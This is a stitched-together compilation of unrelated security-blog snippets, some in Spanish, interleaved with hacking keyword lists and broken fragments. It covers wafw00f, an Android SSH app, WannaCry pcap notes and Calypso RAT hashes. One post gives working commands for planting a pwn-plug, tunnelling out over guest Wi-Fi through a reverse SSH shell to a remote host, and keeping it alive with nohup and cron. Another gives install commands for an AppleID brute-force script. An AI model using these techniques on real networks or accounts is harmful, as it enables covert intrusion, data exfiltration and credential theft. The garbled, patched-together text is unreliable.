
Wafw00F: The Web Application Firewall Fingerprinting Tool

How does wafw00f work?
   To do its magic, WAFW00F does the following steps:
  • Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions.
  • If that is not successful, wafw00f sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is.
  • If that is also not successful, wafw00f analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to wafw00f's attacks.

   For further details, check out the source code on EnableSecurity's main repository.

What does it detect? WAFW00F can detect a number of firewalls, a list of which is as below:

wafw00f's installation
   If you're using Debian-based distro, enter this commands to install wafw00f: sudo apt update && sudo apt install wafw00f

   But if you're using another Linux distro, enter these commands to install wafw00f:

How to use wafw00f?
   The basic usage is to pass an URL as an argument. Example:

Final Words to you
   Questions? Pull up an issue on GitHub Issue Tracker or contact to EnableSecurity.
   Pull requests, ideas and issues are highly welcome. If you wish to see how WAFW00F is being developed, check out the development board.

   Some useful links:

   Presently being developed and maintained by:

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Administración Remota De Servidores Desde Android

Sería muy util poder administrar todos nuestros servidores desde la palma de la mano.

Sin embargo una shell linux, no es viable en el teclado de un teléfono incluso de un tablet, sobretodo porque hay que escribir muchos símbolos, por ejemplo el guión, y estos teclados están pensados más bien para texto.

Pues bien, de esta necesidad surgió la aplicación SSHControl:


Esta problematica la he solucionado a base de utilizar nevegadores y estructurar los outputs para no acumular excesiva información en la pantalla.

- Navegador de ficheros
- Navegador de procesos
- Navegador de conexiones
- Navegador de logs
- Navegador de drivers de kernel

Esto permite administrar múltiples servidores con un solo dedo :)

Controlar la seguridad de sus servidores ahora es bastante sencillo y ágil, por ejemplo con solo hacer un "tap" encima de un usuario, podemos ver sos procesos asociados, con hacer otro tap en un proceso podemos kilearlo, ver mas info etc ..
Con hacer un tap encima de una apliacción, vemos sus conexiónes, con un tap en una conexión podemos agregar una regla de filtrado en el firewall, etc ..

En la siguiente versión habilitaré la opción de "Custom Commnands", la cual es muy util,
cada administrador o usuario linux, tiene una serie de comandos que repite con mucha frecuencia,
bien pues esta opción permite pre-programar estos comandos habituales, de manera que puedes lanzarlos con un simple tap.

En el roadmap tengo pensadas nuevas funcionalidades muy útiles :)

Aqui os dejo algunas capturas de pantalla:

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  2. Google Hacking
  3. Sdr Hacking
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Evolving Logic Until Pass Tests Automatically

Automating the automation is still a challenge, but in some cases it's possible under certain situations.

In 2017 I created logic-evolver, one of my experiments for creating logic automatically or better said evolving logic automatically.

In some way, the computer create its own program that satisfies a set of tests defined by a human.


This implementation in rust, contains a fast cpu emulator than can execute one million instructions in less than two seconds. And a simple genetic algorithm to do the evolution.

Here we create the genetic algorithm, and configure a population of 1000 individuals, and the top 5 to crossover. We run the genetic algorithm with 500 cycles maximum.
Note that in this case the population are programs initially random until take the correct shape.

An evaluation function is provided in the run method as well, and looks like this:

The evaluation function receives a CPU object, to compute a test you need to set the initial parameters, run the program and set a scoring regarding the return value.

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  2. Hacking Academy
  3. Hacking Kali Linux
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  5. Hacking Udemy
  6. Certificacion Ethical Hacking
  7. Programas Para Hackear
  8. Wifi Hacking
  9. Hacking Traduccion
  10. Hacking Traduccion
  11. Hacking Google Home Mini
  12. Hardware Hacking Tools
  13. Growth Hacking Pdf
  14. Que Es El Hacking


Linux/AirDropBot Samples



      Other malware



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  2. 101 Hacking
  3. Javascript Hacking
  4. Libro De Hacking
  5. Hacking Informatico
  6. Hacking Etico Certificacion
  7. Hacking Web Sql Injection Pdf
  8. Tools For Hacking Wifi
  9. Hacking Mac
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How To Protect Your Private Data From Android Apps

In android there is lots of personal data that can be accessed by any unauthorized apps that were installed on the device. This is just because your Android data is openly saved in your file explorer that is not encrypted or protected by encryption method, so, even normal app can also hijack your data very easily as the media access permissions are granted when you click on accept button while installing the apps. And this may be endangering the private data that you might not want to share with anyone. So here we have a cool way that will help you to make your data private by disallowing the apps to access your media files without your permission. So have a look on complete guide discussed below to proceed.

How To Protect Your Private Data From Android Apps

The method is quite simple and just need a rooted android device that will allow the Xposed installer to run on the device. And after having the Xposed installer you will be using an Xposed module to disallow the apps to have access to your personal or say private data. For this follow the guide below.

Steps To Protect Your Private Data From Android Apps:

Step 1. First of all, you need a rooted android as Xposed installer can only be installed on a rooted android, so Root your android to proceed for having superuser access on your android.
Step 2. After rooting your Android device you have to install the Xposed installer on your android and thats quite lengthy process and for that, you can proceed with our Guide to Install Xposed Installer On Android.Xposed Installer
Step 3. Now after having an Xposed framework on your Android the only thing you need is the Xposed module that is DonkeyGuard – Security Management the app that will allow you to manage the media access for apps installed on your device.
Step 4. Now install the app on your device and after that, you need to activate the module in the Xposed installer. Now you need to reboot your device to make the module work perfectly on your device.
Step 5. Now launch the app and you will see all the apps that are currently installed on your device.
privacy 1
Step 6. Now edit the media permission for the apps that you don't want to have access to your media with private data.privacy 2
That's it, you are done! now the app will disallow the media access to that apps.

Manually Checking App Permission

Well, our Android operating system offers a nice feature in which we can manage a single app's permission. However, you need to have Android 6.0 Marshmallow or a newer version to get the option.
Step 1. First of all, open Settings and then tap on 'Apps'.
Manually Checking App Permission
Manually Checking App Permission
Step 2. Now you will see the list of apps that are currently installed on your Android smartphone. Now you need to select the app, and then you will see 'Permissions.'
Manually Checking App Permission
Manually Checking App Permission
Step 3. Now it will open a new window, which will show you all permissions that you have granted to the app like Camera access, contacts, Location, microphone, etc. You can revoke any permissions as per your wish.
Manually Checking App Permission
Manually Checking App Permission
Well, the same thing you need to perform if you feel that you have installed some suspicious app on your Android. By this way, you can protect your private data from Android apps.
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Advantage of Ethical Hacking

Hacking is quite useful in the following purpose-

1-To recover lost information, especially in case you lost your password.

2-To perform penetration testing to strengthen computer and network security.

3-To put adequate preventative measure in place to prevent security breaches.

4-To have a computer system that prevents malicious hackers from gaining access.

5-Fighting against terrorism and national security breaches.

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Pcap Of Wannacry Spreading Using EthernalBlue

Saw that a lot of people were looking for a pcap with WannaCry spreading Using EthernalBlue.

I have put together a little "petri dish" test environment and started looking for a sample that has the exploit. Some samples out there simply do not have the exploit code, and even tough they will encrypt the files locally, sometimes the mounted shares too, they would not spread.

Luckily, I have found this nice blog post from McAfee Labs: https://securingtomorrow.mcafee.com/mcafee-labs/analysis-wannacry-ransomware/ with the reference to the sample SHA256: 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c (they keep referring to samples with MD5, which is still a very-very bad practice, but the hash is MD5: DB349B97C37D22F5EA1D1841E3C89EB4)

Once I got the sample from the VxStream Sandbox site, dropped it in the test environment, and monitored it with Security Onion. I was super happy to see it spreading, despite the fact that for the first run my Windows 7 x64 VM went to BSOD as the EthernalBlue exploit failed.

But the second run was a full success, all my Windows 7 VMs got infected. Brad was so kind and made a guest blog post at one of my favorite sites, www.malware-traffic-analysis.net so you can find the pcap, description of the test environment and some screenshots here: http://malware-traffic-analysis.net/2017/05/18/index2.html

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iCloudBrutter - AppleID Bruteforce

iCloudBrutter is a simple python (3.x) script to perform basic bruteforce attack againts AppleID.

Usage of iCloudBrutter for attacking targets without prior mutual consent is illegal. iCloudBrutter developer not responsible to any damage caused by iCloudBrutter.

$ git clone https://github.com/m4ll0k/iCloudBrutter.git
$ cd iCloudBrutter
$ pip3 install requests,urllib3,socks
$ python3 icloud.py

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Backchannel Data Exfiltration Via Guest/R&D Wi-Fi

Often times I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioning the business units they explain a low value network, which is simply a internet pass thru separate from the internal network. This sounds reasonable and almost plausible however I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more then the former discussion.

What about using OpenWifi as a backchannel data exfiltration medium?

An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering issues, DLP, proxy filtering issues and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished via dual homing your attack host utilizing multiple nic cards which are standard on almost all modern machines. Whether this is from physical access breach or via remote compromise the results can be deadly. Below are a few scenarios, which can lead to undetectable data exfiltration.

Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug is installed into the target network or a linux host with a wireless card. I usually install pwn-plug's inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker owned host. Typically its a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However if there is network egress and proxy filtering present then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail. Unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".

By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather then play the obfuscation game i prefer to bypass the restrictions all together using networks which have escaped corporate policy.

You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.

Connect to wifi:
ifconfig wlan0 up
iwconfig wlan0 essid [targetNetworkSSID]
dhclient wlan0

Run a reverse SSH tunnel:
ssh -R 3000: root@remoteHost.com

On the remote host you can retrieve your shell:
ssh -p 3000 User@localhost

Once you have authenticated with the pwnplug via your local host port forward you now have access into the internal network via an encrypted tunnel which will not be detected and fully bypass any corporate security restrictions. You can take this a bit further and setup some persistence in case the shell goes down.. This can be done via bash and nohup if you setup some ssh keys to handle authentication.. One example could be the following script:

Your bash script: 
while true
 ssh -R 3000: root@remoteHost.com
 sleep 10

Run this with nohup like this:
nohup ./shell.sh &

Another simple way would be to setup a cron job to run a script with your ssh command on a specified interval for example every 5 minutes like so:

Cron job for every 5 minutes: 
*/5 * * * * /shell.sh

Scenario 2: (Remote Windows Compromise)
The second scenario is that of a compromised modern windows machine with a wireless card, this can be used to make a wireless connection outbound similar to the first scenario which will bypass restrictions by accessing an unrestricted network. As shown in "Vista Power Tools" paper written by Josh Wright you can use modern windows machines cards via the command line.

Below are the commands to profile the networks and export a current profile then import a new profile for your target wireless network. Then from there you can connect and use that network to bypass corp restrictions provided that wireless network doesn't have its own restrictions.

Profile Victim machine and extract a wireless profile: 
netsh wlan show interfaces
netsh wlan show networks mode=bssid
netsh wlan show profiles
netsh wlan export profile name="CorpNetwork"

Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.

Upload a new profile and connect to the network: 
netsh wlan add profile filename="R&D.xml"
netsh wlan show profiles
netsh wlan connect name="R&D"

If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.

I just got thinking the other day of ways to abuse so called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all to often that a cable connection not linked to the corporate network is totally safe and I call bullshit on that.

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APT Calypso RAT, Flying Dutchman Samples


 Attackers exploit Windows SMB vulnerability CVE-2017-0143 or use stolen credentials to gain access, deploy the custom Calypso RAT and use it to upload other tools such as Mimikatz, EternalBlue and EternalRomance. They move laterally and steal data.


             Other malware


MD5SHA256SHA1FilenameFile TyeeStage
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1e765fed294a7ad082169819c95d2c85f6a09372156a8aef96576627a1ed9e57f194b008bb77e32ca29ac89505f933f060dda7ccd9ae00701046923b619a1b9c33c8e2acWscntfy.exepe exeCalypso RAT Dropper
17e05041730dcd0732e5b296db16d757b6c21c26aef75ad709f6c9cfa84bfa15b7ee709588382ce4bc3544a04bceb661f3301405d8ad5b160747241d6b2a8d88bf6292e8pe exeCalypso RAT Dropper
1ed72c14c4aab3b66e830e16ef90b37beebff21def49af4e85c26523af2ad659125a07a09db50ac06bd3746483c89f9ddc0d0a34f107d140d9e47582e17a7fec945403eacoal.exepe exeCalypso RAT Dropper
e24a62d9826869bc4817366800a8805cc407c3dde18c9b56ed24492ca257d77a570616074356b8c7854a080823f7ee1753791c9e7c41931a6becb999fee4eb7daf9b1a11data01.binpe dllCalypso RAT Dropper
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69322703b8ef9d490a20033684c28493e6a3b43acdaa824f3280095b10798ea341839f7d43f0460df8989f13c98fa6e0f203680d97705d99f92fe9797691be6177f5fd41RasCon.dllpe dllCalypso RAT Dropper
85ce60b365edf4beebbdd85cc971e84d5dfdee5dd680948d19ab4d16df534cf10aca5fa0b157c59659d6517fe897c62fd9c14f7b6de8e26ae33e41a72ae8e35bb1af4434pe exeCalypso RAT Dropper
6347e42f49a86aff2dea7c8bf455a52a281583aca23f8fd8745dd88a600cbfc578d819859a13957ec022b86c3c1c99f48b2a81af85590e0e36efc1c05aa4f0600ea21545HIDMgr.dllpe dllCalypso RAT Dropper
cb914fc73c67b325f948dd1bf97f57330031c7b63c1e1cd36d55f585d97e2b21a13a19858d5a1aa5455e5cc64b41e6e937ce4d0a3168e3b2f80b3fae38082e68a454aee0pe exeCalypso RAT Dropper
c84df4b2cd0d3e7729210f15112da7ac4e8351ddaff18f7df6fcc27a3c75598e0c56d3b406818d45effb4e78616092c241a0c5a1aad36f405c8755613c732591e3300f97mscorsvw.dllpe dllCalypso RAT Dropper
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2807236c2d905a0675878e530ed8b1f8314e438198f8cc2ee393c75f8e9f2ebd2b5133fd6f2b7deb1178f82782fc63302f6fe857632a67e87f4f3631bfa93713ccdf168aAeLookupMgr.dllpe dllCalypso RAT Payload
cce8c8ee42feaed68e9623185c3f7fe438cc404437b936660066b71cc87a28af1995248d6d4c471706eb1dd347129b4b9d2235c911b86bb6ad55d953a2f56ea78c5478e5AppCert.dll.crtCalypso RAT Payload
e1a578a069b1910a25c95e2d9450c710413622ded5d344a5a78de4fea22cfdabdeb4cdccf69e9a1f58f668096c32473836087a5b0809dc3f9dc5a77355a88e99af491a88RasCfgMan.dll.crtCalypso RAT Payload
0d532484193b8b098d7eb14319cefcd3f8043d6bfc3e63d8561f7f74e65cb7ff1731577ecf6c7559795d9de21298f0fc31f4c6dc6ce78b4e0439b30c830dfd5d9a3fc4feRasCfgMan.dllpe dllCalypso RAT Payload
974298eb7e2adfa019cae4d1a927ab070461710e681fd6dc9f1c83b57f94a88cd6df9e6432174cbfdd70dfd24577a0f841bc37679ce3caeecc176d10b4f8259918e25807VirtualUMP.dll.crtCalypso RAT Payload
05f472a9d926f4c8a0a372e1a71939988017923cd8169bf951106f053408b425f1eb310a9421685638ead55bb3823db38d909bd3450ebe0cffd0cb17b91bc28d23ef5083EFSProvider.dll.crtCalypso RAT Payload
d1a1166bec950c75b65fdc7361dcdc63f3f38c097b0cc5337b7d2dbec098bf6d0a3bb4a3e0336e7b1c8af75268a0a49d5731350f68a74fb4762c4ea878ecff635588a825RasCon.dllpe dll 64bits assemblyCalypso RAT Payload
e3e61f30f8a39cd7aa25149d0f8af5efc4dc7519bccc24c53794bf9178e4a4d0823875c34479d01cedbb3e9b10f5c7301b75ea494c3ac171c5177bdcc263b89a3f24f207MPSSVC.dllpe dllCalypso RAT Payload

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